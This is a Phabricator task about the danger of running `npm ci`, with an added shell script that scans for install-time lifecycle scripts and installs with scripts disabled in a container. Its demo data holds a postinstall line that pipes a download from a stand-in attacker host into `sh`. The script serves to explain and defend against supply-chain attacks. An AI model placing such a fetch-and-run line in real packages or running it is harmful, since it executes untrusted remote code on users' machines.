
Make it clear that running `npm ci` is not secure
Open, Needs Triage, Public

Description

Running `npm ci` is dangerous. See How to protect yourself from npm.

We do it in multiple pages:

The advantage of installing dependencies in a container or virtual machine is security, but then debugging with the browser open becomes impossible.

Pages about debugging (one of them is just a draft for now):

For now I've added a warning to all pages that `npm ci` is not safe.
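As an added example, not part of this task or of the Wikimedia pages it refers to: a POSIX shell script that shows what makes `npm ci` risky and one way to run it more safely. It assumes the reason, which the task itself does not spell out, is that `npm ci` executes the `preinstall`, `install` and `postinstall` lifecycle scripts declared by every installed dependency with the privileges of the user running it. The package names, the attacker URL and the `node:20` image are constructed or assumed, not taken from the task.

```shell
#!/bin/sh
# Added example, not code from the task or from the documentation it links.
# Assumptions: a project with package.json and package-lock.json in $PWD,
# docker optional, the image name node:20 and the package names below are
# made up for the demonstration.
set -eu

# Construct a throwaway node_modules tree with two packages. "evil-dep"
# declares a postinstall lifecycle script, which `npm ci` would run with the
# permissions of whoever runs it; "nice-dep" declares no install-time
# scripts. (Constructed sample data; the script is never executed here.)
make_demo_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/node_modules/evil-dep" "$root/node_modules/nice-dep"
  cat > "$root/node_modules/evil-dep/package.json" <<'EOF'
{
  "name": "evil-dep",
  "version": "1.0.0",
  "scripts": { "postinstall": "curl -s https://attacker.example/x | sh" }
}
EOF
  cat > "$root/node_modules/nice-dep/package.json" <<'EOF'
{
  "name": "nice-dep",
  "version": "2.3.1",
  "scripts": { "test": "node test.js" }
}
EOF
  printf '%s\n' "$root"
}

# List installed packages whose package.json declares an install-time
# lifecycle script. Depth 2 covers plain packages, depth 3 scoped ones
# (@scope/name). A grep over the JSON is enough for triage; it is not a
# JSON parser and will also match a top-level key named "install".
list_lifecycle_scripts() {
  root=$1
  find "$root/node_modules" -mindepth 2 -maxdepth 3 -name package.json |
    while read -r pj; do
      if grep -Eq '"(preinstall|install|postinstall)"[[:space:]]*:' "$pj"; then
        name=${pj#"$root/node_modules/"}
        printf '%s\n' "${name%/package.json}"
      fi
    done | sort
}

# Install from the lock file with lifecycle scripts disabled, inside a
# throwaway container when docker is available, so that a malicious package
# can at most touch the mounted project directory. HOME and the npm cache
# are pointed at /tmp because the container runs as the host's uid.
safe_ci() {
  if command -v docker >/dev/null 2>&1; then
    docker run --rm --user "$(id -u):$(id -g)" \
      -e HOME=/tmp -e npm_config_cache=/tmp/.npm \
      -v "$PWD":/src -w /src node:20 npm ci --ignore-scripts
  else
    npm ci --ignore-scripts
  fi
}

# Run with the argument "demo" to see the scanner on the constructed tree.
if [ "${1:-}" = "demo" ]; then
  d=$(make_demo_tree)
  echo "packages with install-time scripts:"
  list_lifecycle_scripts "$d"
  rm -rf "$d"
fi
```

Two caveats for anyone adopting this: `--ignore-scripts` also skips legitimate build steps (native addons compiled via node-gyp, for instance), so those packages have to be rebuilt deliberately afterwards with `npm rebuild <package>` once their scripts have been reviewed; and, as the task description notes, moving the install into a container does not by itself solve debugging the result in a browser on the host.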

Event Timeline

zeljkofilipin triaged this task as Medium priority.
zeljkofilipin moved this task from Backlog 🪒 to Deep work 🌊 on the User-zeljkofilipin board.
zeljkofilipin updated the task description.

@Krinkle is the warning about `npm ci` not being safe enough for now? Do you think we should focus on making debugging possible in a container and/or virtual machine?

zeljkofilipin raised the priority of this task from Medium to Needs Triage. Sep 17 2021, 9:34 AM